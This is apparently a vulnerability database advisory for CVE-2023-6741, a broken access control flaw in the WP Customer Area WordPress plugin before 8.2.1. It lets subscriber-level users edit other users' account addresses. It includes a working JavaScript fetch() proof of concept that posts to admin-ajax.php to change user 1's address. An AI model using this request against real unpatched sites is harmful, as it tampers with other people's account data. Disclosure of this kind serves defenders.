WordPress Plugin Vulnerabilities

WP Customer Area < 8.2.1 - Subscriber+ Account Address Update

Description

The plugin does not properly validate users capabilities in some of its AJAX actions, allowing malicious users to edit other users' account address.

Proof of Concept

You may get the nonce from *your* save address form

fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
  },
  "body": 'action=cuar_save_address_for_owner&cuar_nonce=a73a7eab3b&owner[type]=usr&owner[ids][]=1&address_id=home_address&address[name]=hohohohoh',
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
})
.then((response) => {
  return response.text();
})
.then((data) => {
  console.log(data);
});

Affects Plugins

Plugin icon
customer-area
Fixed in 8.2.1

References

CVE
CVE-2023-6741

Classification

Type
ACCESS CONTROLS
OWASP top 10
A5: Broken Access Control
CWE
CWE-284

Miscellaneous

Original Researcher
Krzysztof Zając (CERT PL)
Submitter
Krzysztof Zając (CERT PL)
Submitter website
https://cert.pl
Submitter twitter
cert_polska_en
Verified
Yes
WPVDB ID
9debe1ea-18ad-44c4-8078-68eb66d36c4a

Timeline

Publicly Published
2024-01-10 (about 4 months ago)
Added
2024-01-10 (about 4 months ago)
Last Updated
2024-01-10 (about 4 months ago)

Other

Published
Title
Published
2021-11-15
Title
Page/Post Content Shortcode <= 1.0 - Contributor+ Arbitrary Posts/Pages Access
Published
2023-06-02
Title
VK Blocks < 1.58.0.0 - Contributor+ Settings Update via REST API
Published
2021-08-31
Title
WooCommerce Dynamic Pricing & Discounts < 2.4.2 - Unauthenticated Settings Import to Stored XSS
Published
2021-09-02
Title
Meow Gallery < 4.2.0 - Unauthorised Arbitrary Options Update via REST API
Published
2021-10-05
Title
TheCartPress eCommerce Shopping Cart <= 1.5.3.6 - Unauthenticated Arbitrary Admin Account Creation